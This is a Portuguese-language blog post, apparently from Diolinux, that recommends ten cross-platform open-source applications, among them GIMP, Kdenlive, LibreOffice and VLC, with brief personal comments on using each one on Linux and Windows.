Listei aqui 10 aplicativos de código aberto que eu utilizo praticamente todos os dias e que poderiam ser usados no Windows também. Acho importante ressaltar a importância disso, quando bons aplicativos existem em várias plataformas, alguém usa Windows pode passar a usar Linux sem sentir falta de muitos programas e o contrário também é verdadeiro.

Conheça agora a minha lista de 10 aplicativos de código aberto que podem ser usados em ambas as plataformas.

1 - Firefox

Firefox Linux e Windows

Um dos navegadores mais populares do mundo e utilizado por milhões de pessoas está presente em ambas as plataformas, a experiência de usar o Mozilla Firefox no Windows e no Linux é basicamente a mesma, então em uma possível migração isso não fará muita diferença. Claro que o Firefox não é o único browser multiplataforma, temos outras opções que convergem, como o Chrome, Vivaldi, Opera entre outros.

2 - GIMP

GIMP para Linux e WIndows

Eu uso o GIMP todos os dias, na verdade, todas as imagens que você está vendo neste artigo foram feitos nele. O GIMP também pode ser utilizado no Windows sem maiores problemas, inclusive, a nossa modificação, o PhotoGIMP, pode ser usado no sistema da Microsoft também. Ele é um ótimo programa para manipulação de imagens.


Inkscape para Windows e Linux

Outro programa que eu costumo usar com frequência, não tanto quanto o GIMP, mas ainda assim, com frequência, é o Inkscape. Um programa para imagens vetoriais. Você pode ver alguns trabalhos feitos com ele no próprio logo do blog e do canal, na DioStore também e em alguns outros projetos aqui do site. O Inkscape está disponível para usar no Windows também sem maiores problemas.


Kdenlive Windows e Linux

Este é um dos meus softwares favoritos de todos, recentemente o Kdenlive ganhou um porte para Windows, que na verdade ainda está em progressão, você pode ver ele rodando no Windows neste vídeo do nosso canal. Para quem não conhece, o Kdenlive é um editor de vídeos não linear que está muito próximo de ser o melhor aplicativo para edição de vídeo completamente grátis, sem versões pagas com mais recursos. Vale muito a pena conhecer.


VirtualBox para Windows e Linux

Máquinas virtuais são extremamente úteis, ao menos para mim, com elas eu consigo experienciar praticamente qualquer sistema operacional, que é algo que eu faço muito, basta olhar a playlist de reviews de sistemas operacionais que temos no canal. O VirtualBox pode ser utilizado em qualquer sistema também, sem distinção.


LibreOffice para Windows e Linux

O LibreOffice é uma ótima suíte office que deve atender a maior parte dos usuários de computador. O maior problema que usuários do Libre tem é abrir documentos do Microsoft Office sem desconfigurar o documento, isso acontece não por culpa do Libre, mas pelo próprio formato proprietário do Office que tem essa intenção mesmo, funcionar somente nele. 

Deixando isto de lado, as funções do LibreOffice atendem diversos governos ao redor do mundo e diversas empresas e é um dos softwares de código aberto que tem mais relevância do mercado. O mesmo LibreOffice que você pode usar no Linux você pode usar no Windows.


OBS Studio

Este é um programa que ficou muito popular entre os YouTubers, o OBS Studio tem versão para Linux e Windows e permite que você faça captura de tela no seu computador ou faça live streams para o YouTube, entre muitas outras funções.

Hoje ele é um programa muito importante para a produção do canal Diolinux.

8 - VLC

VLC Windows e Linux

O VLC é um dos melhores players multimídia que existem, reza a lenda que ele "toca até tampa de Danone". Isso acontece porque o VLC tem vários codecs inclusos no próprio programa, o que dispensa a instalação de pacotes adicionais para reproduzir praticamente qualquer tipo mídia.


Audacity Windows e Linux

Outro programa muito importante para quem produz conteúdo, especialmente em áudio. O Audacity é um editor de áudio grátis e aberto muito útil, especialmente para fazer redução de ruído em arquivos gravados em ambientes externos.


Thunderbird Windows e Linux

Outro programa que eu uso com frequência é o Thunderbird, um programa para fazer gerenciamento de contas de e-mail. Ele é simples e funcional, também tem versão para todas as plataformas. Já atendi algumas empresas fazendo implantação do Thunderbird no lugar no Microsoft Outlook.

Existem muitos outros


Existem outros programas que podem ser usados em ambas as plataformas, inclusive, a maioria desta lista também pode ser utilizada no macOS da Apple, não somente no Windows e no Linux. Fique à vontade para colocar nos comentários mais programas que você gosta e que possuem versões para todas as plataformas.

Até a próxima!
_____________________________________________________________________________
Viu algum erro ou gostaria de adicionar alguma sugestão a essa matéria? Colabore, clique aqui.